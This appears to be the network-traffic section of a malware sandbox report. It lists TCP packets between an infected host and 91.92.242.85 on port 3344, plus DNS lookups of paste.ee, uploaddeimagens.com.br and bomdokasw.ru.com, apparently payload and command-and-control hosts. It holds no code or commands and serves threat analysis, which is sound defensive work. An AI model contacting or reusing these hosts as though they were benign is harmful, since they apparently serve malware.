Apr 30, 2024 07:59:57.611603022 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611610889 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611615896 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611624002 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611638069 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611644030 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611651897 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611664057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611675024 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611685991 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611687899 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611701965 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611706018 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611715078 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.611716032 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.611778021 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.693284988 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.733879089 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805608988 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805633068 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805644989 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805658102 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805670023 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805682898 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805697918 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805713892 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805713892 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805728912 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805742979 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805757046 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805769920 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805783987 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805790901 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805799007 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805808067 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805814981 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805824041 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805828094 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805844069 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805846930 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805859089 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805866957 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805874109 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805888891 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805905104 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805907965 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805923939 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805937052 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805944920 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805949926 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805953979 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805964947 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805978060 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.805985928 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.805990934 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806011915 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806013107 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806029081 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806041002 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806052923 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806060076 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806066990 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806080103 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806082964 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806093931 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806101084 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806107998 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806122065 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806133986 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806138039 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806148052 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.806178093 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.806216955 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.927508116 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.968247890 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.999857903 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999888897 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999908924 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999922991 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999937057 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999953032 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999952078 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:57.999967098 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999982119 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:57.999993086 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000022888 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000040054 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000221014 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000240088 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000252008 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000266075 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000277996 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000291109 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000293016 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000308037 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000313997 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000322104 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000329018 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000335932 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000348091 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000360966 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000369072 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000375032 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000392914 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000394106 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000412941 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000427008 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000431061 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000438929 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000448942 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000451088 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000463009 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000477076 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000483990 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000488997 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000502110 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000505924 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000514984 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000528097 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000534058 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000540018 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000552893 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000560045 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000566006 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000576973 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000577927 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000592947 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000607014 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000612974 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000622034 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.000632048 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.000751019 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.161969900 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193907022 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193923950 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193937063 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193950891 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193953991 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.193964005 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193984032 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.193984985 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.193999052 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194013119 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194026947 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194207907 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194248915 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194283962 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194405079 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194417000 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194428921 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194441080 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194449902 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194453001 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194466114 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194478989 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194488049 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194493055 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194505930 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194505930 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194521904 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194533110 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194561958 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194623947 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194638014 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194649935 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194669008 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194673061 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194681883 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194689989 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194701910 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194714069 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194715023 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194727898 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194744110 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194746017 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194756985 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194760084 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194772959 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194785118 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194789886 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194799900 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194809914 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194813013 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194825888 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194839001 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194849014 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194850922 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194864988 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.194878101 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.194890976 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.249492884 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.387835026 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387860060 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387872934 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387887001 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387898922 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387912035 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387927055 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.387929916 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387948036 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387960911 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387964010 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.387978077 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.387994051 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388041973 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388053894 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388057947 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388086081 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388094902 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388108015 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388161898 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388221979 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388237000 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388248920 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388261080 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388269901 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388273954 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388288021 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.388298988 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.388324976 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.392606974 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.392627001 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.392640114 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.392652988 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.392668009 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.393059969 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.535541058 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.587341070 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587470055 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587482929 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587495089 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587508917 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587522984 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587534904 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587547064 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587565899 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587579012 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587589979 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587601900 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587615013 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.587615013 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.587627888 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.588002920 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.608836889 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.729275942 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:58.729372025 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.765809059 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:58.847453117 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:59.003048897 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:59.003102064 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:59.237585068 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:59.237646103 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:59.471910000 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:59.471960068 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:59.706150055 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:59.706199884 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:59.883052111 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:59.940912962 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:00.076471090 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:00.100521088 CEST	3344	49712	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:00.101389885 CEST	49712	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:08.299467087 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:08.494699955 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:08.511414051 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:08.753773928 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:18.365083933 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:18.437009096 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:22.502911091 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:22.738109112 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:23.100810051 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:23.104455948 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:23.347522974 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:37.818854094 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:38.016551018 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:38.019659996 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:38.253679991 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:48.377290964 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:48.421463966 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:51.984477997 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:52.181806087 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:00:52.183334112 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:00:52.425795078 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:06.205521107 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:01:06.441299915 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:06.488393068 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:06.490406036 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:01:06.738029957 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:18.403331041 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:18.452708006 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:01:26.609396935 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:01:26.805516005 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 08:01:26.806814909 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 08:01:27.050561905 CEST	3344	49711	91.92.242.85	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 30, 2024 07:59:22.175816059 CEST	53072	53	192.168.2.7	1.1.1.1
Apr 30, 2024 07:59:31.909065962 CEST	54051	53	192.168.2.7	1.1.1.1
Apr 30, 2024 07:59:32.034302950 CEST	53	54051	1.1.1.1	192.168.2.7
Apr 30, 2024 07:59:35.282810926 CEST	53463	53	192.168.2.7	1.1.1.1
Apr 30, 2024 07:59:35.387450933 CEST	53	53463	1.1.1.1	192.168.2.7
Apr 30, 2024 07:59:48.016431093 CEST	57926	53	192.168.2.7	1.1.1.1
Apr 30, 2024 07:59:48.491219044 CEST	53	57926	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 30, 2024 07:59:22.175816059 CEST	192.168.2.7	1.1.1.1	0x6ca3	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:31.909065962 CEST	192.168.2.7	1.1.1.1	0xe2a	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:35.282810926 CEST	192.168.2.7	1.1.1.1	0x59cd	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:48.016431093 CEST	192.168.2.7	1.1.1.1	0x1014	Standard query (0)	bomdokasw.ru.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 30, 2024 07:59:22.278315067 CEST	1.1.1.1	192.168.2.7	0x6ca3	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 30, 2024 07:59:29.207706928 CEST	1.1.1.1	192.168.2.7	0xde97	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 30, 2024 07:59:29.207706928 CEST	1.1.1.1	192.168.2.7	0xde97	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:32.034302950 CEST	1.1.1.1	192.168.2.7	0xe2a	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:32.034302950 CEST	1.1.1.1	192.168.2.7	0xe2a	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:35.387450933 CEST	1.1.1.1	192.168.2.7	0x59cd	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 30, 2024 07:59:35.387450933 CEST	1.1.1.1	192.168.2.7	0x59cd	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
